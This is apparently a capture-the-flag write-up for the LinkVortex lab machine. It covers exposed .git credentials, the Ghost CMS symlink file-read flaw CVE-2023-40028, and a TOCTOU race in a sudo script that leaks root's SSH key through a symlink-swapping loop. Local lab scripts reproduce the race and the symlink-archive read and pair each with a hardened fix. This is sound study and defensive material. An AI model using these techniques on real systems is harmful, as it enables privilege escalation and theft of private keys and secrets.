LinkVortex is an easy Linux machine created by . The linkvortex.htb domain runs Ghost CMS. Subdomain fuzzing finds dev.linkvortex.htb, which exposes a .git directory; dumping the repository yields the password for the Ghost CMS login. The Ghost version in use, 5.58.0, is vulnerable to CVE-2023-40028, an authenticated arbitrary file read, which gives the foothold. The user bob may run /opt/ghost/clean_symlink.sh via sudo; the script has a time-of-check-to-time-of-use (TOCTOU) window between its symlink check and its read of the quarantined file, and exploiting it discloses root's id_rsa.
OS: Linux
Difficulty: Easy
Points: 20
Release Date: 07-12-2024
Retired Date: 12-04-2025
Enumeration
Nmap
Starting with an nmap scan: ports 22 (ssh) and 80 (http) are open. With 8 s of latency, service detection reports both only as tcpwrapped, but the HTTP title shows a redirect to http://linkvortex.htb/.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-20 21:03 EDT
Nmap scan report for 10.10.11.47
Host is up (8.0s latency).
Not shown: 749 filtered tcp ports (no-response), 249 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open tcpwrapped
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://linkvortex.htb/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.18 seconds
Add linkvortex.htb to the /etc/hosts file, pointing at 10.10.11.47.
Web - linkvortex.htb
linkvortex.htb is a blog that publishes detailed articles about computer parts.
The page footer shows that the site runs Ghost CMS, and browsing to the /ghost path brings up the Ghost admin login page.
Fuzzing
Subdomain fuzzing finds dev.linkvortex.htb, which exposes a .git directory. After dumping it, git status shows the state of the working tree.
git status
Not currently on any branch.
Changes to be committed:
(use "git restore --staged <file>..." to unstage)
new file: Dockerfile.ghost
modified: ghost/core/test/regression/api/admin/authentication.test.js
The file ghost/core/test/regression/api/admin/authentication.test.js has been modified and staged but not committed, so the version in the working tree differs from the one in HEAD.
ssh bob@10.10.11.47
The authenticity of host '10.10.11.47 (10.10.11.47)' can't be established.
ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.47' (ED25519) to the list of known hosts.
bob@10.10.11.47's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Apr 21 08:29:20 2025 from 10.10.14.46
bob@linkvortex:~$
Privilege Escalation
Pillaging - bob [ user ]
sudo -l shows that bob can run /usr/bin/bash /opt/ghost/clean_symlink.sh as root without a password, with any argument matching *.png, and that the CHECK_CONTENT environment variable survives sudo (env_keep+=CHECK_CONTENT).
bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT
User bob may run the following commands on linkvortex:
(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
bob@linkvortex:~$
We have no write permission on clean_symlink.sh: it is root-owned with mode 744.
bob@linkvortex:~$ ls -la /opt/ghost/clean_symlink.sh
-rwxr--r-- 1 root root 745 Nov 1 08:46 /opt/ghost/clean_symlink.sh
bob@linkvortex:~$
File - clean_symlink.sh
clean_symlink.sh
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
The script takes a .png path as its only argument and checks whether it is a symbolic link.
If it is, the script reads the link target with readlink (one hop only, as a string) and greps it for the substrings etc or root, which is meant to catch targets under /etc or /root.
On a match the link is unlinked; otherwise the link itself is moved into the quarantine directory /var/quarantined and, if $CHECK_CONTENT is true, the script cats the quarantined entry. That cat follows the symlink, so what gets printed is the content of whatever the link points to at that moment, not what it pointed to when it was checked.
Shell - root [ TOCTOU ]
Methodology
The time-of-check-to-time-of-use window lies between the target check (readlink + grep) and the later cat of /var/quarantined/<name>. The check inspects the link while it still sits in our directory; the read happens on the entry in the quarantine directory, which bob can write to. If we keep replacing /var/quarantined/<name> with a link to a sensitive path such as /root/.ssh/id_rsa, the script's mv drops our harmless link there, our loop overwrites it again, and the cat reads root's file. Because sudoers preserves CHECK_CONTENT through env_keep, we can set CHECK_CONTENT=true ourselves to make the script print the content.
Exploit
1. Forcing the symbolic link
In one shell, run a loop that keeps recreating the symlink in the quarantine directory; ln -sf overwrites the entry whenever something else has replaced it.
bob@linkvortex:~$ while true; do ln -sf /root/.ssh/id_rsa /var/quarantined/exp.png; done
2. Getting id_rsa
In another shell, create a symlink with the same file name (exp.png) in a different directory, pointing at a harmless target so the readlink check passes, and run clean_symlink.sh on it through sudo with CHECK_CONTENT=true in the environment. The script moves our link into the quarantine directory, the loop immediately replaces it with the link to /root/.ssh/id_rsa, and the cat prints root's SSH private key.
Copy the private key into a file, restrict its permissions and SSH in as root.
chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.47
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Dec 2 11:20:43 2024 from 10.10.14.61
root@linkvortex:~#
If ssh reports a libcrypto error when loading the key, the pasted id_rsa contains stray whitespace or a broken line; remove it so the PEM block is intact.
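The race described in the methodology, plus a caveat that the same check can be bypassed without racing, reproduced locally as an added example; this is not the machine's script and not the writeup's own commands. It assumes nothing about the box: setup_lab, clean_symlink_vuln, race_exploit, chain_bypass and clean_symlink_hardened are hypothetical names, the whole lab lives in a temporary directory and needs no sudo, and a directory called root_home stands in for /root so that its path trips the '(etc|root)' grep just like the real target.

```shell
#!/usr/bin/env bash
# Added example (not the machine's script): unprivileged re-creation of the
# clean_symlink.sh logic in a temp dir. Shows the mv -> cat TOCTOU race, a
# symlink-chain bypass of the single-hop readlink check, and a hardened variant.
# The 1 s sleep widens the race window so the demo is reproducible; on the box
# it is microseconds, which is why the exploit needs a tight loop.

setup_lab() {
  LAB=$(cd "$(mktemp -d)" && pwd -P)
  QUAR_DIR="$LAB/quarantined"          # /var/quarantined on the box, writable by bob
  ALLOWED_DIR="$LAB/bob"               # the only place the hardened variant reads from
  SECRET="$LAB/root_home/.ssh/id_rsa"  # stands in for /root/.ssh/id_rsa (constructed)
  mkdir -p "$QUAR_DIR" "$LAB/root_home/.ssh" "$ALLOWED_DIR"
  echo "FAKE-PRIVATE-KEY" > "$SECRET"
  echo "harmless" > "$ALLOWED_DIR/real.png"
}

# Same control flow as clean_symlink.sh: one-hop readlink, substring grep, mv, cat.
clean_symlink_vuln() {
  local link=$1 name target
  case "$link" in *.png) ;; *) return 2 ;; esac
  [ -L "$link" ] || return 0
  name=$(basename "$link")
  target=$(readlink "$link")                 # time of check: first hop only, as text
  if echo "$target" | grep -Eq '(etc|root)'; then
    unlink "$link"; return 0
  fi
  mv "$link" "$QUAR_DIR/"
  sleep 1                                    # the window the attacker races into
  if [ "${CHECK_CONTENT:-false}" = true ]; then
    cat "$QUAR_DIR/$name" 2>/dev/null        # time of use: follows whatever is there now
  fi
  return 0
}

# Steps 1 and 2 of the writeup: keep the quarantine entry pointing at the secret,
# pass a harmless link through the check, let the post-mv cat read the swapped link.
race_exploit() {
  ln -sfn "$ALLOWED_DIR/real.png" "$ALLOWED_DIR/exp.png"
  (
    i=0
    while [ "$i" -lt 5000 ]; do
      i=$((i + 1))
      [ "$(readlink "$QUAR_DIR/exp.png" 2>/dev/null)" = "$SECRET" ] ||
        ln -sfn "$SECRET" "$QUAR_DIR/exp.png"
    done
  ) >/dev/null 2>&1 &
  local pid=$!
  CHECK_CONTENT=true clean_symlink_vuln "$ALLOWED_DIR/exp.png"
  kill "$pid" 2>/dev/null || true
  wait "$pid" 2>/dev/null || true
}

# Caveat: no race needed. readlink reports only the first hop, cat follows the chain.
chain_bypass() {
  ln -sfn "$SECRET" "$ALLOWED_DIR/hop"                 # inner hop carries the 'root' string
  ln -sfn "$ALLOWED_DIR/hop" "$ALLOWED_DIR/chain.png"  # outer link shows only .../bob/hop
  CHECK_CONTENT=true clean_symlink_vuln "$ALLOWED_DIR/chain.png"
}

# Hardened: resolve the whole chain, allow only targets under ALLOWED_DIR, and read
# the resolved target instead of the attacker-writable quarantine entry. The quarantine
# directory must also be root-owned 0700; a shell script cannot open O_NOFOLLOW, so a
# user who can rewrite ALLOWED_DIR itself still has a much narrower race left.
clean_symlink_hardened() {
  local link=$1 resolved
  case "$link" in *.png) ;; *) return 2 ;; esac
  [ -L "$link" ] || return 0
  resolved=$(readlink -f "$link")
  case "$resolved" in
    "$ALLOWED_DIR"/*) ;;
    *) unlink "$link"; return 1 ;;
  esac
  mv "$link" "$QUAR_DIR/"
  if [ "${CHECK_CONTENT:-false}" = true ]; then cat "$resolved"; fi
  return 0
}
```

Running setup_lab followed by race_exploit prints the fake key; chain_bypass prints it too, with no loop at all. On the box the same sequence is the loop from step 1 in one shell and, in another, a harmless exp.png link in bob's home passed to the script through sudo with CHECK_CONTENT=true in the environment, which sudoers keeps via env_keep.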
Proof of Concept
The video below provides the PoC for the LinkVortex machine.
Ghost versions below 5.59.1 are vulnerable to CVE-2023-40028, an arbitrary file read. A PoC in the form of a bash script is available in this github .
Affected versions allow authenticated users to upload files that are symbolic links. This can be exploited to read any file on the host operating system that the Ghost process can reach, since serving the uploaded file follows the link. More details can be found .
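The class of bug described above, reproduced locally as an added example; this is not Ghost's code and not the linked PoC. It assumes the upload is an archive that carries a symlink entry, which is how the public PoCs for this CVE deliver it; tar stands in for the archive format, make_lab, vulnerable_upload, archive_has_links and hardened_upload are hypothetical names, and a cat of the extracted path stands in for static file serving.

```shell
#!/usr/bin/env bash
# Added example (not Ghost's code): an "upload" archive containing a symlink entry,
# extracted as-is and then served, discloses whatever the link points to. The
# hardened handler rejects link entries before extraction and re-checks the result.
# Everything lives in a temp dir; config.production.json is a constructed stand-in
# for a file outside the upload root.

make_lab() {
  LAB=$(cd "$(mktemp -d)" && pwd -P)
  SECRET="$LAB/config.production.json"
  echo '{"database":{"password":"s3cret"}}' > "$SECRET"
  SRC="$LAB/theme-src"
  mkdir -p "$SRC/assets"
  echo 'real asset' > "$SRC/assets/logo.png"
  ln -s "$SECRET" "$SRC/assets/steal.png"      # malicious entry: tar stores it as a symlink
  tar -cf "$LAB/evil.tar" -C "$SRC" assets      # the attacker's upload
  tar -cf "$LAB/ok.tar" -C "$SRC" assets/logo.png
}

# Vulnerable handler: extract, then serve a path from the extracted tree.
# $1 = archive, $2 = request path relative to the theme root.
vulnerable_upload() {
  local dest="$LAB/themes-vuln"
  rm -rf "$dest"; mkdir -p "$dest"
  tar -xf "$1" -C "$dest"                       # link entries become live symlinks
  cat "$dest/$2"                                # file serving follows them
}

# True if the archive listing has any symlink (l) or hard link (h) entries.
# Works on GNU and BSD tar: the mode column is the first field of -tv output.
archive_has_links() {
  tar -tvf "$1" | awk '$1 ~ /^[lh]/ { found = 1 } END { exit !found }'
}

# Hardened handler: refuse link entries up front, strip any link the extractor still
# produced, and only serve paths whose canonical form stays under the theme root
# (this also covers "../" in the request path).
hardened_upload() {
  local dest="$LAB/themes-safe" target
  rm -rf "$dest"; mkdir -p "$dest"
  if archive_has_links "$1"; then
    echo "rejected: archive contains link entries" >&2
    return 1
  fi
  tar -xf "$1" -C "$dest"
  find "$dest" -type l -delete
  target=$(readlink -f "$dest/$2")
  case "$target" in
    "$dest"/*) cat "$target" ;;
    *) echo "rejected: path escapes theme root" >&2; return 1 ;;
  esac
}
```

The pre-extraction listing check is the cheap fix; the post-extraction find and the canonical-path check are there because archive formats differ in how they encode links and because the request path is attacker-controlled too.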